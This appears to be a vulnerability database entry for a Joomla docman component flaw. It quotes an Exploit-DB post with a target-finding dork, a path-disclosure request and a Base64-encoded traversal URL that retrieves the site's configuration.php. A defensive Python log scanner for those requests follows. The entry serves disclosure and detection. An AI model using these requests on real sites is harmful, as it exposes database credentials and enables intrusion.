Vendor: docman Component
By: Hugo Santiago dos Santos
CVSS: 7.5 (HIGH)
Title: Full Path Disclosure & Local File Disclosure/Include
CWE: 200, 98
Product Name: docman Component
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2015

Joomla docman Component ‘com_docman’ Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

The Joomla docman component 'com_docman' is vulnerable to Full Path Disclosure (FPD) and Local File Disclosure/Include (LFD/LFI) because it does not properly validate user-supplied input. The FPD is triggered by a request with a blank parameter, and the LFD/LFI by a specially crafted request carrying a malicious parameter. Together they give an attacker access to sensitive information such as the server path and the configuration file.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized. Access to sensitive files should be restricted.

Exploit-DB raw data:

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"

# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 The Full Path Disclosure of the server will occur in the title.
 
# Xploit (LFD/LFI):

 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we need to use the FPD Xploit to see the path of the target; after that we'll insert the 'configuration.php' database configuration file and encode it in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 

And Now we have a configuration file...
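
For defenders, both request shapes described above (a blank `file` value, and a Base64 `file` value that decodes to a path outside the document directory) can be searched for in web server access logs. The following Python script is an added example, not part of the original advisory or the component's code; the log format, sample lines and finding labels are constructed, and it assumes legitimate `file` values are Base64-encoded relative names.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

DL2_PATH = "/components/com_docman/dl2.php"   # script named in the advisory
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jul/2015:10:00:01 +0000] "GET /components/com_docman/dl2.php?archive=0&file= HTTP/1.1" 200 512',
    '203.0.113.5 - - [13/Jul/2015:10:00:09 +0000] "GET /components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== HTTP/1.1" 200 2048',
    '198.51.100.7 - - [13/Jul/2015:10:01:00 +0000] "GET /components/com_docman/dl2.php?archive=0&file=bWFudWFsLnBkZg== HTTP/1.1" 200 90210',
    '198.51.100.7 - - [13/Jul/2015:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 100',
]

def classify_file_param(value):
    """Label one `file` value: a finding name, or None when nothing stands out."""
    if value == "":
        return "empty-file-param"        # blank value: the path-disclosure request
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return "not-base64"              # assumption: legitimate values are Base64
    decoded = raw.decode("utf-8", "replace")
    if ".." in re.split(r"[\\/]", decoded):
        return "traversal"               # climbs out of the document directory
    if decoded.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", decoded):
        return "absolute-path"
    return None

def scan(lines):
    """Return (line_no, label) for each suspicious dl2.php request in `lines`."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        url = urlsplit(match.group(1)) if match else None
        if url is None or not url.path.lower().endswith(DL2_PATH):
            continue
        # parse_qs turns '+' into a space, so restore it before Base64 decoding.
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            label = classify_file_param(value.replace(" ", "+"))
            if label:
                findings.append((line_no, label))
    return findings

if __name__ == "__main__":
    for line_no, label in scan(SAMPLE_LOG):
        print(f"line {line_no}: {label}")
```

The same decode, split and reject logic is what the mitigation above asks of the server side: decode the parameter, refuse any value containing a `..` segment or an absolute path, and only then resolve it against the document directory.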